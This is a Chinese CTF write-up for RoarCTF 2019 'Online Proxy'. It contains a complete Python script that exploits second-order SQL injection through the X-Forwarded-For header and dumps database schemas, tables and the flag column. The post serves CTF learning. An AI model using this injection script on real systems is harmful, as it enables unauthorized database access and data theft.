zoukankan      html  css  js  c++  java
  • [RoarCTF 2019]Online Proxy

    [RoarCTF 2019]Online Proxy

    题目复现链接:https://buuoj.cn/challenges
    参考链接:官方wp

    看到记录数据和源代码里面注释中的ip地址,猜测是把客户端的IP地址记录到数据库当中。
    经过尝试发现添加X-Forwarded-For可以修改ip,找到注入点

    接下来我的思路是比较常规的时间盲注,赵师傅则是将字符转为数字直接输出,效率高得多,贴出来学习一下

    #!/usr/bin/env python3
    
    import requests
    
    target = "http://localhost:8302/"
    
    def execute_sql(sql):
        print("[*]请求语句:" + sql)
        return_result = ""
    
        payload = "0'|length((" + sql + "))|'0"
        session = requests.session()
        r = session.get(target, headers={'X-Forwarded-For': payload})
        r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
        r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
        start_pos = r.text.find("Last Ip: ")
        end_pos = r.text.find(" -->", start_pos)
        length = int(r.text[start_pos + 9: end_pos])
        print("[+]长度:" + str(length))
    
        for i in range(1, length + 1, 5):
            payload = "0'|conv(hex(substr((" + sql + ")," + str(i) + ",5)),16,10)|'0"
    
            r = session.get(target, headers={'X-Forwarded-For': payload}) # 将语句注入
            r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})    # 查询上次IP时触发二次注入
            r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})    # 再次查询得到结果
            start_pos = r.text.find("Last Ip: ")
            end_pos = r.text.find(" -->", start_pos)
            result = int(r.text[start_pos + 9: end_pos])
            return_result += bytes.fromhex(hex(result)[2:]).decode('utf-8')
    
            print("[+]位置 " + str(i) + " 请求五位成功:" + bytes.fromhex(hex(result)[2:]).decode('utf-8'))
    
        return return_result
    
    
    # 获取数据库
    print("[+]获取成功:" + execute_sql("SELECT group_concat(SCHEMA_NAME) FROM information_schema.SCHEMATA"))
    
    # 获取数据库表
    print("[+]获取成功:" + execute_sql("SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e'"))
    
    # 获取数据库表
    print("[+]获取成功:" + execute_sql("SELECT group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e' AND TABLE_NAME = 'F4l9_t4b1e' "))
    
    # 获取表中内容
    print("[+]获取成功:" + execute_sql("SELECT group_concat(F4l9_C01uMn) FROM F4l9_D4t4B45e.F4l9_t4b1e"))
    
    
  • 相关阅读:
    jQuery的父,子,兄弟节点查找方法
    我们的产品最终入驻淘宝服务市场
    iframe显示滚动栏
    自己定义控件三部曲之动画篇(十三)——实现ListView Item进入动画
    [叁]Pomelo游戏server编程分享 之 server结构与配置分析
    数列求和
    字节与字符_字节流与字符流_ASCII与Unicode_GB2312_GBK_GB18030_BIG-5
    Codeforces Round #257(Div. 2) B. Jzzhu and Sequences(矩阵高速幂)
    呼叫保持流程
    PDF转EPUB格式电子书经验总结
  • 原文地址:https://www.cnblogs.com/20175211lyz/p/11719397.html
Copyright © 2011-2022 走看看